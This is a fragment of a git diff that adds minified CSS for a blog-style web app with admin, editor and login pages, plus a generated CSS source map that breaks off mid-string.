.ql-picker-item[data-value="5"]:before{font-size:.83em}.ql-snow .ql-picker.ql-header .ql-picker-item[data-value="6"]:before{font-size:.67em}.ql-snow .ql-picker.ql-font{width:108px}.ql-snow .ql-picker.ql-font .ql-picker-item:before,.ql-snow .ql-picker.ql-font .ql-picker-label:before{content:"Sans Serif"}.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]:before,.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=serif]:before{content:"Serif"}.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]:before,.ql-snow .ql-picker.ql-font .ql-picker-label[data-value=monospace]:before{content:"Monospace"}.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=serif]:before{font-family:Georgia,Times New Roman,serif}.ql-snow .ql-picker.ql-font .ql-picker-item[data-value=monospace]:before{font-family:Monaco,Courier New,monospace}.ql-snow .ql-picker.ql-size{width:98px}.ql-snow .ql-picker.ql-size .ql-picker-item:before,.ql-snow .ql-picker.ql-size .ql-picker-label:before{content:"Normal"}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]:before,.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=small]:before{content:"Small"}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=large]:before,.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=large]:before{content:"Large"}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]:before,.ql-snow .ql-picker.ql-size .ql-picker-label[data-value=huge]:before{content:"Huge"}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=small]:before{font-size:10px}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=large]:before{font-size:18px}.ql-snow .ql-picker.ql-size .ql-picker-item[data-value=huge]:before{font-size:32px}.ql-snow .ql-color-picker.ql-background .ql-picker-item{background-color:#fff}.ql-snow .ql-color-picker.ql-color .ql-picker-item{background-color:#000}.ql-toolbar.ql-snow{border:1px solid #ccc;box-sizing:border-box;font-family:Helvetica Neue,Helvetica,Arial,sans-serif;padding:8px}.ql-toolbar.ql-snow .ql-formats{margin-right:15px}.ql-toolbar.ql-snow .ql-picker-label{border:1px solid transparent}.ql-toolbar.ql-snow .ql-picker-options{border:1px solid transparent;box-shadow:0 2px 8px rgba(0,0,0,.2)}.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-label,.ql-toolbar.ql-snow .ql-picker.ql-expanded .ql-picker-options{border-color:#ccc}.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item.ql-selected,.ql-toolbar.ql-snow .ql-color-picker .ql-picker-item:hover{border-color:#000}.ql-toolbar.ql-snow+.ql-container.ql-snow{border-top:0}.ql-snow .ql-tooltip{background-color:#fff;border:1px solid #ccc;box-shadow:0 0 5px #ddd;color:#444;padding:5px 12px;white-space:nowrap}.ql-snow .ql-tooltip:before{content:"Visit URL:";line-height:26px;margin-right:8px}.ql-snow .ql-tooltip input[type=text]{border:1px solid #ccc;display:none;font-size:13px;height:26px;margin:0;padding:3px 5px;width:170px}.ql-snow .ql-tooltip a.ql-preview{display:inline-block;max-width:200px;overflow-x:hidden;text-overflow:ellipsis;vertical-align:top}.ql-snow .ql-tooltip a.ql-action:after{border-right:1px solid #ccc;content:"Edit";margin-left:16px;padding-right:8px}.ql-snow .ql-tooltip a.ql-remove:before{content:"Remove";margin-left:8px}.ql-snow .ql-tooltip a{line-height:26px}.ql-snow .ql-tooltip.ql-editing a.ql-preview,.ql-snow .ql-tooltip.ql-editing a.ql-remove{display:none}.ql-snow .ql-tooltip.ql-editing input[type=text]{display:inline-block}.ql-snow .ql-tooltip.ql-editing a.ql-action:after{border-right:0;content:"Save";padding-right:0}.ql-snow .ql-tooltip[data-mode=link]:before{content:"Enter link:"}.ql-snow .ql-tooltip[data-mode=formula]:before{content:"Enter formula:"}.ql-snow .ql-tooltip[data-mode=video]:before{content:"Enter video:"}.ql-snow a{color:#06c}.ql-container.ql-snow{border:1px solid #ccc}*{box-sizing:border-box;font-family:Inter,sans-serif;margin:0;padding:0}body{background-color:#fff}.header{align-items:center;background-color:#000;display:flex;flex-direction:column;justify-content:center;padding:20px}.main-title{color:#d2cccc;font-size:2.5em;font-weight:800;letter-spacing:3px}.navbar>ul{list-style-type:none;margin-top:30px}.navbar>ul>li{display:inline;font-weight:800;margin:5px;padding:5px}.navbar>ul>li:hover{background-color:#383a3a;border-radius:2px}.body-card{display:flex;flex-direction:row;flex-wrap:wrap;justify-content:space-evenly;margin-top:10px}.body-card a,.navbar a{color:#aeaaaa;font-size:.75em;font-weight:900;letter-spacing:3px;padding:7px;text-decoration:none}.body-card .card-title{font-size:.9em;font-weight:700;letter-spacing:2px;width:400px}.card>ul{display:inline;list-style-type:none}.post-type-link{margin-bottom:10px}.post-type-link>a{color:#aaa7a7;letter-spacing:2px;padding:0}.post-type-link>a:hover{color:#030303}.card-details>ul{display:inline-block;list-style-type:none;margin:10px 0 0;padding:0}.card-details>ul>li{color:#2a2a31;display:inline-block;font-size:.8em;font-weight:900}.card-details>ul>li>a{font-size:1em;letter-spacing:.1em}.card-details>ul>li>a:hover{color:#000}.card-content{-webkit-line-clamp:3;-webkit-box-orient:vertical;display:-webkit-box;font-weight:400;letter-spacing:.4px;margin-bottom:20px;margin-top:15px;overflow:hidden;width:400px}.load-more-button{display:flex;flex-direction:row;justify-content:center;margin-bottom:50px}.load-more-button>button{background-color:#000;color:#fff;cursor:pointer;letter-spacing:.2em;padding:10px;width:200px}.footer{align-items:center;background-color:#000;color:#fff;color:#d2cccc;display:flex;flex-direction:row;font-family:Inter;font-size:2.5em;justify-content:center;letter-spacing:3px;padding:30px;position:absolute;width:100%}.input-name{background-color:#fff;border-radius:7px;color:#000;font-family:Inter;height:40px;margin:4px 60px 0 0;padding:5px;width:500px}.admin-save-btn,.search-btn{background-color:#fff;cursor:pointer;font-family:Inter;font-weight:700;height:35px;line-height:3px;padding:3px;width:100px}.admin-content{border:2px solid #ff4500;display:flex}.admin-title{background-color:#f5f7f7;border:.2px solid grey;border-radius:10px;font-size:1.1rem;height:3rem;letter-spacing:.9px;padding:20px;width:50rem}.admin-save-btn{background-color:#eba925;border:0;border-radius:10px;font-size:.9rem;height:3rem;letter-spacing:1.3px}.admin-save-btn:active{-webkit-transform:translateY(3px);transform:translateY(3px)}.admin-editor{border:1px solid #adff2f;display:flex}.admin-editor-content{border:5px solid brown}.sidebar{display:flex}.sidebar .logo{margin-left:20px;margin-top:1px;width:110px}.sidebar .nav-menu{background-color:#19183b;display:flex;height:100vh;justify-content:center;position:fixed;width:220px}.nav-text{height:60px;justify-content:flex-start;list-style:none;padding:8px 0 8px 16px}.nav-text,.nav-text a{align-items:center;display:flex}.nav-text a{border-radius:4px;color:#f5f5f5;font-size:18px;height:100%;letter-spacing:.5px;padding:16px;text-decoration:none;width:95%}.nav-text:hover{background-color:#313964}.nav-menu-items{margin-top:20px;width:100%}.sidebar span{margin-left:16px}Basic editor styles + +.ProseMirror>*+*{margin-top:.75em}.ProseMirror ol,.ProseMirror ul{padding:0 1rem}.ProseMirror h1,.ProseMirror h2,.ProseMirror h3,.ProseMirror h4,.ProseMirror h5,.ProseMirror h6{line-height:1.1}.ProseMirror code{background-color:rgba(97,97,97,.1);color:#616161}.ProseMirror pre{background:#a3a0a0;border-radius:.5rem;color:#fff;font-family:JetBrainsMono,monospace;padding:.75rem 1rem}.ProseMirror pre code{background:none;color:#000;font-size:.8rem;padding:0}.ProseMirror img{height:auto;max-width:100%}.ProseMirror blockquote{border-left:2px solid hsla(0,0%,5%,.1);padding-left:1rem}.ProseMirror hr{border:none;border-top:2px solid hsla(0,0%,5%,.1);margin:2rem 0}.author,.dashboard,.posts,.profile,.settings{display:flex;margin-left:270px;margin-right:50px;margin-top:40px;padding:10px}.settings{display:block}.posts-div{display:flex;flex:2.35 1 25%}.posts-btn-div{display:flex;flex-grow:1;justify-content:flex-end}.newpost-editor{border:1px solid #ded9d9;border-radius:10px;flex:3 1 33.33%;height:500px;overflow:scroll;padding:40px}.newpost-editor-leftdetails{align-items:flex-end;display:flex;flex-direction:column;flex-grow:1;gap:3em;justify-content:space-between}.newpost-editor-leftdetails-author-select span{font-size:14px;font-weight:500}.post-image-upload{align-items:flex-end;display:flex;flex-direction:column;justify-content:flex-end}.post-image-upload img{border:.4px solid #d9d3c7;border-radius:10px;width:200px}.posts-btn,.posts-title{border:.1px solid grey;border-radius:10px;font-size:1em;padding:10px}.posts-title{background-color:#eff2f5;flex-grow:1}.posts-btn{background-color:#384da2;color:#fff;width:100px}.posts-btn:hover{background-color:#286fbb;cursor:pointer}.posts-btn:active{-webkit-transform:translateY(3px);transform:translateY(3px)}.image-input-class{background-color:#ecca74;font-weight:600;margin-top:10px;width:200px}.editor{height:250px}.author{align-items:center;display:flex;justify-content:center}h2{font-size:2rem}.author-content{align-items:center;display:flex;justify-content:space-between}.author-btn-div{margin-left:230px}.author-btn-div,.data-grid{align-items:center;display:flex;justify-content:center}.data-grid{height:59vh}.login-main-container{border:.5px solid #cdc3c3;border-radius:10px;box-shadow:4px 4px 4px 4px #e6ecec;display:flex;height:80vh;justify-content:flex-start;margin:10vh auto auto;width:80%}.login-image{border-bottom-left-radius:10px;border-top-left-radius:10px;height:100%;margin-top:0;width:50%}.login-secondary-container{height:80%;margin:auto 100px;width:80%}.login-secondary-container-signup{height:98%}.h3-login-container{align-items:flex-start;display:flex;flex-direction:column;height:20vh;justify-content:flex-end;margin-left:2.5%;margin-right:2.5%;width:95%}.h3-login-container-signup{align-items:center;height:2vh;justify-content:flex-start;margin-left:-1.5px;width:100%}.h3-login-container-reset{height:10vh;justify-content:center}.h3-login{font-weight:100;letter-spacing:1px}.login-form-container{height:20vh;margin-left:2.5%;margin-right:2.5%;margin-top:30px;width:95%}.login-form-container-signup{margin-top:5px}.login-form-container-reset{height:30vh;margin-top:0}.login-span{font-size:14px;margin-left:0}.login-span-signup{font-size:12px}.login-input{border:.3px solid grey;border-radius:7px;height:40px;margin-top:10px;padding:10px;width:95%}.login-input-signup{margin-top:4px;padding:5px}.login-button-container-main{height:20vh;margin-left:2.5%;margin-right:2.5%;margin-top:15px;width:95%}.login-button-container-main-reset{margin-top:60px}.login-button-container{background-color:#3554d2;border:0;border-radius:7px;color:#fff;cursor:pointer;font-size:15px;padding:15px;width:95%}.login-button-container:active{-webkit-transform:translateY(3px);transform:translateY(3px)}.login-reset-password,.login-signup-button{color:#1f1f5c;letter-spacing:0}.login-reset-password{float:right;margin-right:10px;margin-top:-2px}.signup-select{border-radius:7px;margin:10px 10px 2px -2px;padding:10px}.settings-title{font-size:1.5rem;letter-spacing:.9px}.settings-div{border:.7px solid #e8e2e2;border-radius:10px;box-shadow:2px 2px 2px 2px #e6ecec;margin-top:30px;padding:30px}.settings-menu-title{font-size:1.1rem;margin-bottom:10px}.change-password-form{padding:20px}.settings-menu-sub-heading-span{display:inline-block;font-size:16px;font-weight:500;letter-spacing:.3px;margin-bottom:5px;margin-left:17px}.settings-menu-sub-heading-input{background-color:#fafaf9;border:1px solid #bfbbbb;border-radius:10px;height:35px;letter-spacing:1px;margin-bottom:15px;margin-left:17px;padding:10px;width:300px}.author-name{margin:0}.settings-menu-sub-heading-submit{background-color:#2c974b;border:0;border-radius:10px;color:#fff;cursor:pointer;font-size:16px;height:40px;letter-spacing:1px;margin-left:18px;padding:10px;width:300px}.profile{border:1px solid #000;display:block}.editorcontent{line-height:1.7em;margin-top:10px;padding:30px}.emailUserListClass{-webkit-user-select:none;-ms-user-select:none;user-select:none} +/*# sourceMappingURL=main.e8c9e839.css.map*/ \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css.map b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css.map new file mode 100644 index 0000000..398a514 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css.map @@ -0,0 +1 @@ +{"version":3,"file":"static/css/main.e8c9e839.css","mappings":"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6BACE,8DACF,CACA,6BACE,wBACF,CACA,oCACE,oCACF,CACA,6BACE,uDACF,CACA,6BACE,wBACF,CACA,oCACE,wCACF,CACA,6BACE,gDACF,CACA,6BACE,wBACF,CACA,oCACE,wCACF,CACA,6BACE,yCACF,CACA,6BACE,wBACF,CACA,oCACE,oCACF,CACA,6BACE,kCACF,CACA,6BACE,wBACF,CACA,oCACE,wCACF,CACA,6BACE,2BACF,CACA,6BACE,wBACF,CACA,oCACE,wCACF,CACA,6BACE,oBACF,CACA,6BACE,wBACF,CACA,oCACE,oCACF,CACA,+CACE,gBACF,CACA,iDACE,kBACF,CACA,wDACE,iBACF,CACA,0DACE,mBACF,CACA,+CACE,gBACF,CACA,iDACE,kBACF,CACA,wDACE,iBACF,CACA,0DACE,mBACF,CACA,+CACE,gBACF,CACA,iDACE,mBACF,CACA,wDACE,iBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,+CACE,iBACF,CACA,iDACE,mBACF,CACA,wDACE,kBACF,CACA,0DACE,oBACF,CACA,qBACE,aAAc,CACd,cACF,CACA,qCACE,aACF,CACA,oCACE,iBACF,CACA,wBACE,qBACF,CACA,sBACE,wBACF,CACA,yBACE,qBACF,CACA,yBACE,qBACF,CACA,wBACE,wBACF,CACA,uBACE,qBACF,CACA,yBACE,qBACF,CACA,2BACE,UACF,CACA,yBACE,aACF,CACA,4BACE,UACF,CACA,4BACE,UACF,CACA,2BACE,aACF,CACA,0BACE,UACF,CACA,4BACE,UACF,CACA,0BACE,yCACF,CACA,8BACE,wCACF,CACA,0BACE,eACF,CACA,0BACE,eACF,CACA,yBACE,eACF,CACA,6BACE,aAAc,CACd,kBACF,CACA,4BACE,iBACF,CACA,6BACE,kBACF,CACA,2BACE,gBACF,CACA,2BACE,oBAAsB,CACtB,8BAA+B,CAC/B,iBAAkB,CAClB,SAAU,CACV,mBAAoB,CACpB,iBAAkB,CAClB,UACF,CACA,qDAEE,UAAW,CACX,UAAW,CACX,aACF,CACA,uDAEE,eAAgB,CAChB,WAAY,CACZ,cAAe,CACf,oBAAqB,CACrB,UAAW,CACX,WAAY,CACZ,eAAgB,CAChB,UACF,CACA,+DAEE,UAAW,CACX,WACF,CACA,iFAEE,YACF,CACA,6FAEE,YACF,CACA,6jBAcE,UACF,CACA,kgDA4BE,SACF,CACA,kgDA4BE,WACF,CACA,wBACE,mGAEE,UACF,CACA,8PAIE,SACF,CACA,8PAIE,WACF,CACF,CAIA,oBACE,qBACF,CACA,oBACE,YACF,CACA,6CAEE,iBACF,CACA,qBACE,iBAAkB,CAClB,kCAA2B,CAA3B,0BACF,CACA,uBACE,cAAe,CACf,oBACF,CACA,6BACE,mCAA4B,CAA5B,2BACF,CACA,qBACE,oBAAqB,CACrB,qBACF,CACA,2BACE,UAAW,CACX,UAAW,CACX,aACF,CACA,oBACE,SAAU,CACV,WAAY,CACZ,oBAAqB,CACrB,qBAAsB,CACtB,cACF,CACA,0BACE,SAAU,CACV,WAAY,CACZ,oBAAqB,CACrB,cACF,CACA,8CAEE,SACF,CACA,mBACE,SACF,CACA,kBACE,iBACF,CACA,8CAEE,cACF,CACA,yBACE,UACF,CACA,sCACE,YACF,CACA,gDACE,cACF,CACA,iDACE,YACF,CACA,uBACE,aACF,CACA,uBACE,eACF,CACA,uBACE,gBACF,CACA,uBACE,aACF,CACA,uBACE,eACF,CACA,uBACE,eACF,CACA,sBACE,yBACF,CACA,+BACE,0BAA2B,CAC3B,iBAAkB,CAClB,cAAe,CACf,iBACF,CACA,iDAEE,wBAAyB,CACzB,iBACF,CACA,wBAEE,iBAAkB,CAClB,cAAe,CACf,gBAAiB,CAHjB,oBAIF,CACA,yBACE,aAAc,CACd,eACF,CACA,kCACE,wBAAyB,CACzB,aAAc,CACd,gBACF,CACA,wBACE,cACF,CACA,oBACE,UAAW,CACX,oBAAqB,CACrB,UAAW,CACX,cAAe,CACf,eAAgB,CAChB,WAAY,CACZ,iBAAkB,CAClB,qBACF,CACA,0BACE,cAAe,CACf,oBAAqB,CACrB,WAAY,CACZ,gBAAiB,CACjB,iBAAkB,CAClB,iBAAkB,CAClB,UACF,CACA,iCACE,oBAAqB,CACrB,gBACF,CACA,4BACE,qBAAsB,CACtB,YAAa,CACb,cAAe,CACf,eAAgB,CAChB,iBAAkB,CAClB,kBACF,CACA,4CACE,cAAe,CACf,aAAc,CACd,kBAAmB,CACnB,eACF,CACA,iDACE,UAAW,CACX,SACF,CACA,0DACE,SACF,CACA,4DACE,WACF,CACA,mDACE,aAAc,CACd,eAAgB,CAChB,QAAS,CACT,SACF,CACA,mDAEE,UACF,CACA,qFAEE,eACF,CACA,6FAEE,SACF,CACA,4CACE,aACF,CACA,yCACE,WAAY,CAEZ,eAAgB,CADhB,UAEF,CACA,6CACE,eAAgB,CAChB,WACF,CACA,0CACE,4BAA6B,CAC7B,UAAW,CACX,WAAY,CACZ,UAAW,CACX,SAAY,CACZ,UACF,CACA,mEAEE,eAAgB,CADhB,iBAAkB,CAElB,OAAQ,CACR,OAAQ,CACR,UACF,CACA,+fAME,wBACF,CACA,8BACE,UACF,CACA,2GAEE,gBACF,CACA,2IAEE,mBACF,CACA,2IAEE,mBACF,CACA,2IAEE,mBACF,CACA,2IAEE,mBACF,CACA,2IAEE,mBACF,CACA,2IAEE,mBACF,CACA,qEACE,aACF,CACA,qEACE,eACF,CACA,qEACE,gBACF,CACA,qEACE,aACF,CACA,qEACE,eACF,CACA,qEACE,eACF,CACA,4BACE,WACF,CACA,uGAEE,oBACF,CACA,2IAEE,eACF,CACA,mJAEE,mBACF,CACA,qEACE,yCACF,CACA,yEACE,wCACF,CACA,4BACE,UACF,CACA,uGAEE,gBACF,CACA,2IAEE,eACF,CACA,2IAEE,eACF,CACA,yIAEE,cACF,CACA,qEACE,cACF,CACA,qEACE,cACF,CACA,oEACE,cACF,CACA,wDACE,qBACF,CACA,mDACE,qBACF,CACA,oBACE,qBAAsB,CACtB,qBAAsB,CACtB,qDAA+D,CAC/D,WACF,CACA,gCACE,iBACF,CACA,qCACE,4BACF,CACA,uCACE,4BAA6B,CAC7B,mCACF,CAIA,0HACE,iBACF,CACA,4HAEE,iBACF,CACA,0CACE,YACF,CACA,qBACE,qBAAsB,CACtB,qBAAsB,CACtB,uBAA4B,CAC5B,UAAW,CACX,gBAAiB,CACjB,kBACF,CACA,4BACE,oBAAqB,CACrB,gBAAiB,CACjB,gBACF,CACA,sCAEE,qBAAsB,CADtB,YAAa,CAEb,cAAe,CACf,WAAY,CACZ,QAAW,CACX,eAAgB,CAChB,WACF,CACA,kCACE,oBAAqB,CACrB,eAAgB,CAChB,iBAAkB,CAClB,sBAAuB,CACvB,kBACF,CACA,uCACE,2BAA4B,CAC5B,cAAe,CACf,gBAAiB,CACjB,iBACF,CACA,wCACE,gBAAiB,CACjB,eACF,CACA,uBACE,gBACF,CACA,yFAEE,YACF,CACA,iDACE,oBACF,CACA,kDACE,cAAiB,CACjB,cAAe,CACf,eACF,CACA,4CACE,qBACF,CACA,+CACE,wBACF,CACA,6CACE,sBACF,CACA,WACE,UACF,CACA,sBACE,qBACF,CC96BA,EAGC,qBAAsB,CACtB,4BAAgC,CAHhC,QAAS,CACT,SAGD,CAEA,KACE,qBACF,CAGA,QAKC,kBAAmB,CAJnB,qBAAuB,CACvB,YAAa,CACb,qBAAsB,CACtB,sBAAuB,CAEvB,YACD,CAEA,YACC,aAAyB,CACzB,eAAgB,CAEf,eAAgB,CADjB,kBAED,CAEA,WACC,oBAAqB,CACrB,eAED,CAEA,cACC,cAAe,CAGd,eAAgB,CAFjB,UAAW,CACX,WAED,CAEA,oBACE,wBAAiC,CAClC,iBAC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